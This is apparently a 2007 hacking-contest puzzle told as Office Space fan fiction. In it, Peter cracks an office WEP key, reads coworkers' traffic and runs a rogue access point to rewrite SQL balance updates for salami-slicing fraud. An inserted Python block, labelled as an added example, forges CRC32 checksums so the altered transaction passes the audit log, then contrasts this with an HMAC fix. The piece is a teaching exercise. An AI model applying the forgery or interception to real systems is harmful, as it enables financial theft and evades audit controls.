Microsoft Office Space: A SQL With Flair

April 19, 2007

Intelguardians
Author, Counter Hack Reloaded

Please read Tom Liston's challenge, compose your answers, and e-mail them to skillz0407@ethicalhacker.net with the 'Subject: Skillz Submission' by May 21, 2007.  Tom will choose three winners by the end of May, who will receive an autographed copy of one of Tom and Ed's books.

Feel free to discuss the scenario in the forums but PLEASE do not post your answers.
You wouldn't want someone else winning your prize, would you?


Skillz Sponsored by Core Security Technologies

 

Microsoft Office Space
A SQL With Flair  

“Mmm, yeah, Peter… I'm going to need you to just go ahead and come in on Sunday… O.K.?  That'd be great.”

 

Gasping for air, Peter Gibbons sat up in bed, bathed in sweat.

 

After a moment or two of confusion, his heart pounding, he leaned back against his pillow and exhaled slowly.  It had just been another nightmare.

 

Joanna softly murmured something in her sleep, rolled over, her back to him, pulling most of the blanket off of him in the process.  Peter sat, wide awake now, and wondered just how long it would be before he went completely insane.

 

Unbelievably, things had actually turned around for a little while.  He had been happy.  The fire at Initech had not only destroyed the building and the company, but it had destroyed all evidence of the virus that he, Michael and Samir had planted in the accounting system.  Ironically, while the flames were destroying all evidence of wrongdoing– accounting records, virus code, system logs– they were also destroying $305,326.13 in unsigned travelers checks that Peter had slipped under Lumburgh's door along with a note containing his confession.

 

It was all pretty crazy.  He had gone to sleep one night, sure that he was going to be spending a good chunk of his life in PMITA Federal prison, and the next morning, like some twisted miracle, everything had just… worked out.  After spending the next several days in an alcoholic haze, he had sobered up and taken a job working construction with Laurence, his next-door neighbor.

 

From his current perspective, looking back, the subsequent five years of his life seemed somewhat inevitable.  He had married Joanna, of course, and things had been great.  They didn't have much, but they had each other and they were happy.  Then, one morning, they sat together in the bathroom, staring at the plus sign on the little plastic pregnancy test, knowing that their lives would never be the same.

 

It wasn't that Peter didn't love his son– he loved Peter Jr. more than life itself.  It was just that there was something that came along with kids that he could do without:  responsibility.

 

Working construction had barely paid the bills when it was just him and Joanna.  Suddenly there was formula and diapers to pay for, and Joanna wasn't picking up any more waitressing hours at Chotchkie's.  He even considered trying to recover the money from the destroyed travelers checks, but had decided that it was just too risky.  After what seemed like the thousandth time that he slept on the couch after he and Joanna argued over money, he had finally given in, quit his construction job, and joined Michael and Samir at Initrode.

 

Life in the cube farm was just as bad as he remembered.  Every morning he walked out the door, prepared to have the soul sucked from his body.  Every night, he returned home to his little family, exhausted and beaten.  But there was food on the table, cable TV, and things had gotten better with Joanna.  She had slipped easily into the role of suburban housewife: cooking meals and doing laundry while reading about Brad and Angelina in People magazine.

 

Peter hated every minute of it, but as bad as it was, he told himself that things could always be worse.  Finally, after a year or two passed, he had pretty well resigned himself to the fact that life was just going to continually screw him.

 

Then, six months ago, life decided that it liked rough sex:  Initrode hired Lumburgh.

 

“I really, really hate that guy,” Samir had said earlier that day at lunch.  “He drives me crazy.”

 

“I know he's going to make me come in on Sunday,” Peter said, looking dejectedly at his cup of coffee.  “Things are just as bad as they were back at Initech.”

 

“Did you see that memo he emailed to everyone?” Michael said, dumping teaspoonful after teaspoonful of sugar into his cup. “'TPS Report cover sheets must now contain summary data for all Initrode divisions segregated by both region and market type and must be printed in color.'  Color!  The only color printer anywhere near me is on the other side of the floor!  I printed the stupid cover page to that printer, walked all the way over there, and the printer is flashing ‘DENSITY SENSOR OUT OF RANGE’.  Density sensor?  WTF does that mean?  Maybe they should hook a density sensor up to Lumburgh's head…”

 

“I have an idea,” Peter ventured, not taking his eyes off of his cup of coffee.  “I have a way that we can get ourselves out of this mess.  A way that we can walk away from Initrode, Lumburgh, cube farms, and density sensors forever.  I have a way that we can all just retire and walk away.”

 

Peter looked up.  Samir and Michael were both staring at him, wordlessly.

 

“Do you remember the virus?” Peter asked.

 

“Holy crap, Peter, you're not thinking of doing that again,” said Michael, shifting uncomfortably in his seat.

 

“You are a very bad person,” said Samir, “You know we all could've gone to prison before!  How can you even think…”

 

“It'll work this time…,” said Peter slowly.  “It'll work and they'll never catch us.”

 

“That's what you said last time,” Michael said, “And you know very well that if Milton hadn't gone postal and burned the place down, we'd all three be wearing orange jump suits and be 'married' to the guy with the most cigarettes.  That fire was the best thing that could've happened.  Poor Milton.  You know what I heard?  I heard that the fire was so hot that they never found his body.”

 

“The idea is pretty much the same,” said Peter, ignoring Michael. “We're not really stealing anything.  We'd just be taking fractions of a cent at a time– the amount that gets rounded down on a financial transaction.  We just do it on thousands and thousands of transactions, and over time, bingo!  We retire!”

 

“Salami slicing,” said Samir, “that's the term for it.  Even if it's only a small amount, it's still stealing.  And they'll catch us.”

 

“No,” said Peter, “they won't.”


“Yes they will,” Michael said, looking sternly at Peter. “Didn't you learn anything last time?”

 

“Yeah.  I learned not to trust you to program something.”

 

“Hey.  That's not fair.  So I was off by a place or two when I did my rounding– like you've never made a mistake.  Anyway, it doesn't change the fact that they'll catch us.  A virus will be found.  They'll trace it to us.  They'll catch us, Peter.”

 

“No they won't,” said Peter, smiling. “Because there won't be a virus.”

 

Peter went on to explain his plan, and even though they were initially against it, slowly Samir and Michael began to come around.

 

It worked like this:  Peter's desk, at Initrode, was located directly below the head of the Accounting department's office.  Peter's cube had originally been located by the windows overlooking the air conditioning chillers, but when Lumburgh had been brought into management, he had immediately started moving cubes and desks around– supposedly to “improve efficiency,” but in reality it was just his soulless and evil way of exerting control. 

 

The networking guys had quickly gotten sick of running and re-running CAT 5, so after a few weeks, they installed a wireless LAN and of course, they secured it… with WEP.  Over the next month, Peter had played around with several tools and had cracked the WEP key… which was, unsurprisingly, “TRODE”. 

 

Using the cracked WEP key, Peter had begun watching wireless traffic as a way of passing time.  He knew, for example, that Nina in HR and Brian in Sales were not only secretly dating, but also had some rather “interesting” ideas of how to spend a Friday evening.  He even had seen some evidence that Lumburgh himself was having a fling.  But as interesting as all of that was, something else had caught his eye. 

 

Every Friday afternoon, Initrode's accounting department fired off an update of a database containing information on vendor accounts.  Some process running on the head of Accounting's machine kicked out thousands of SQL transactions over the course of several hours.  Each transaction looked like this:

 

SELECT balance FROM account WHERE acctno = 141143153;

SELECT balance FROM account WHERE acctno = 57165156;

UPDATE account SET balance = 1021651.711031 WHERE acctno = 57165156;

UPDATE account SET balance = 164145.162110 WHERE acctno = 141143153;

 

Obviously, the process that generated these transactions was pulling balance information from two accounts, Initrode's payables account (acctno = 57165156) and some vendor account. It would then credit the vendor account, debit the Initrode account, and update the database accordingly.

 

The interesting thing was that the account balances were being stored to six decimal places.

 

“Typical,” said Michael, “Initrode programmers are all idiots.”

 

“You're an Initrode programmer,” said Samir.

 

“Shut up and let him finish,” Michael said, finally showing the interest that Peter was hoping for.

 

“The wireless access point for the Accounting department is at the far side of the Accounting floor.  I ran a hard wired network line to my machine, fired up a Linux bootable CD and set my machine up as an access point with the same name and WEP key as the one in Accounting.  I set up packet forwarding and suddenly I have all of these machines in Accounting routing traffic through my machine.”

 

“So?” said Michael and Samir, in unison.

 

“Don't you see?  If the traffic is routing through my machine, I can change it.  I can add a new statement into the mix:”

 

SELECT balance FROM account WHERE acctno = 141143153;

SELECT balance FROM account WHERE acctno = 57165156;

UPDATE account SET balance = 1021651.711031 WHERE acctno = 57165156;

UPDATE account SET balance = 164145.16 WHERE acctno = 141143153;

UPDATE account SET balance = 135.535532 WHERE acctno = 31337;

 

“Who is account 31337?” asked Samir.

 

 

“That's us,” Peter said. “We set up an account for us.  Then we take all the fractions of a cent that are being credited to other vendors, and we credit them to us.”

 

“31337?” said Samir, “Isn't that… well… a little childish?”

 

“It's just an example.  The account number doesn't matter.”

 

“Good.  Because when we get caught, I don't want them thinking that we're a bunch of high school kids.”

 

“I just picked a number… we can use any number we want…  and besides, we're not going to get caught.”

 

“Yes we are,” said Michael.

 

“Why?”

 

“Because, I know how that system works.  Fooling with it isn't going to be as simple as you think it is.”  Michael leaned back, took a sip of coffee, frowned and proceeded to dump several more teaspoonfuls of sugar into his cup before continuing.  “Initrode is paranoid.  I worked on that system a few months back, and it has a little feature that you missed.  Every SQL statement containing an UPDATE is logged– locally on the head of accounting's machine, and on the MSSQL server itself.”

 

“You're kidding,” said Peter, seeing his one chance for freedom evaporating before his eyes.

 

“Nope.  They log any SQL statement that contains an UPDATE in both places and then, every so often, they compare the logs.  A few years back, they had some big screw up in the system.  Nothing malicious, just some whacked transactions.  Took them weeks to get things straightened out.  So now they store the full text of any SQL statement containing an UPDATE on the server, and mark it with a timestamp.  They hold it there until they verify it.  That way they can roll it back if something gets messed up.”

 

“What do they store on the head of Accounting's machine?”

 

“The CRC32, which is calculated on the transaction text and then stored along with the timestamp of when the transaction was acknowledged.  They decided that it could be some sort of privacy issue to store full text on the head of Accounting's machine… it’s a laptop, and they're afraid he'll lose it or something.  I don't know why we don't run some kind of full disk encryption on our laptops here.  It's not like it's horribly expensive, but they're not going to do…”

 

“So they are storing something like 8630F991 if the transaction text is 'SELECT balance FROM account WHERE acctno = 64145162;'?” said Samir.

 

Michael was staring at Samir, his mouth hanging open. “How did you do that?”

 

“Calculator on my cell phone…”

 

“You can't generate CRC32s on the calculator on your cellphone,” Michael countered.

 

“I have a really nice cell phone…” said Samir, shifting the argument into high gear.

 

But Peter wasn't listening.  He was sitting back in his chair, a smile slowly forming on his face…
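The point Peter has just caught, worked through as an added example (this code is not part of Tom Liston's challenge text). A CRC32 is a linear checksum, not a collision-resistant hash: for any message prefix there is exactly one four-byte suffix that yields a given CRC32 value, and it can be computed directly rather than searched for. The two statements are the ones from Peter's second example; everything else is this example's own assumption: that Initrode's periodic comparison recomputes CRC32 over the text stored on the server and matches it against the CRC32 the laptop logged, that the server logs whatever text arrives for that transaction as one entry (so both UPDATEs can ride in a single forged text), that a trailing `--` line comment is tolerated, and the HMAC-SHA256 check shown for contrast with a constructed key.

```python
import hashlib
import hmac
import zlib

# Statements from the story: the legitimate UPDATE the laptop sends (and logs
# a CRC32 of), and the pair of UPDATEs Peter wants the server to run instead.
ORIGINAL = b"UPDATE account SET balance = 164145.162110 WHERE acctno = 141143153;"
FORGED_CORE = (b"UPDATE account SET balance = 164145.16 WHERE acctno = 141143153; "
               b"UPDATE account SET balance = 135.535532 WHERE acctno = 31337;")

# Standard reflected CRC-32 table (polynomial 0xEDB88320), identical to zlib's.
POLY = 0xEDB88320
TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ POLY if _c & 1 else _c >> 1
    TABLE.append(_c)
# The high byte of every table entry is distinct, so the register can be
# walked backwards one input byte at a time.
REV = {TABLE[i] >> 24: i for i in range(256)}
assert len(REV) == 256


def _step(reg, byte):
    """One CRC-32 register update for a single input byte."""
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)


def forge_suffix(prefix, target_crc):
    """Return the 4 bytes s such that zlib.crc32(prefix + s) == target_crc."""
    reg = zlib.crc32(prefix) ^ 0xFFFFFFFF        # raw register after prefix
    want = target_crc ^ 0xFFFFFFFF               # raw register we must end in
    # Backwards from the wanted register: the high byte identifies which table
    # entry was XORed in at each of the last four steps.
    idx = [0] * 4
    for k in range(3, -1, -1):
        i = REV[want >> 24]
        idx[k] = i
        want = (((want ^ TABLE[i]) << 8) & 0xFFFFFFFF) | i
    # Forwards again, choosing each byte so the table index comes out right.
    out = bytearray()
    for k in range(4):
        b = (reg ^ idx[k]) & 0xFF
        out.append(b)
        reg = _step(reg, b)
    return bytes(out)


def forge_statement(core, target_crc, max_tries=100000):
    """Pad `core` with a trailing SQL line comment so its CRC32 equals target_crc.

    The four forced bytes must be the last bytes of the text.  Arbitrary byte
    values could contain a newline (ending the comment) or bytes the log cannot
    store, so a decimal nonce is varied until all four are printable ASCII;
    (95/256)**4 is about 1.9%, so roughly 50 attempts on average.
    """
    for nonce in range(max_tries):
        candidate = core + b" -- " + str(nonce).encode()
        suffix = forge_suffix(candidate, target_crc)
        if all(0x20 <= b <= 0x7E for b in suffix):
            return candidate + suffix
    raise RuntimeError("no printable suffix found")


def initrode_check(laptop_crc, server_text):
    """The comparison as assumed here: CRC32 of the server's stored text
    against the CRC32 the laptop logged for that transaction."""
    return zlib.crc32(server_text) == laptop_crc


def keyed_check(key, laptop_tag, server_text):
    """Contrast: the same comparison with an HMAC-SHA256 tag.  Matching it
    requires the key; linearity tricks do not help."""
    tag = hmac.new(key, server_text, hashlib.sha256).digest()
    return hmac.compare_digest(tag, laptop_tag)


def demo():
    laptop_crc = zlib.crc32(ORIGINAL)             # what the laptop logged
    forged = forge_statement(FORGED_CORE, laptop_crc)
    key = b"constructed demo key"                 # assumption: a secret the MITM lacks
    laptop_tag = hmac.new(key, ORIGINAL, hashlib.sha256).digest()
    return {
        "forged": forged,
        "laptop_crc": laptop_crc,
        "forged_crc": zlib.crc32(forged),
        "crc_check_passes": initrode_check(laptop_crc, forged),     # True
        "hmac_check_passes": keyed_check(key, laptop_tag, forged),  # False
    }


if __name__ == "__main__":
    r = demo()
    print(r["forged"].decode())
    print("CRC32 comparison passes:", r["crc_check_passes"])
    print("HMAC comparison passes:", r["hmac_check_passes"])
```

The forged text executes both UPDATEs, ends in a harmless comment, and carries the same CRC32 the laptop recorded for the statement it replaced; a comparison that trusts the CRC32 is satisfied. A keyed tag the man-in-the-middle cannot recompute is the minimal repair to the log comparison; authenticating and encrypting the database connection itself removes the rewrite opportunity altogether, and neither of those is something a WEP key protects.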

 

Questions:

 

1) Aside from hating their jobs, what impending action might be another reason for the boys to try this plan?

2) Why was Peter smiling?  What mistakes had Initrode made in their accounting system design?

3) Give a working example of a forged transaction using the values in Peter's second example.

4) How should the transaction system be fixed to avoid this kind of problem in the future?

 

Remember, please submit your answers to skillz0407@ethicalhacker.net with the Subject: 'Skillz Submission' by May 21, 2007. By the end of May, we’ll announce three winners, one from each of these categories:

· Best technical answer
· Most creative and technically correct answer
· Random draw from all answers submitted, correct, incorrect, complete, partially complete, etc.

Each winner gets an autographed copy of one of Tom Liston and Ed Skoudis' books, congratulating you on your victory and amazing abilities!

Microsoft and Office are registered trademarks of Microsoft Corp. All rights reserved.

Category: Skillz
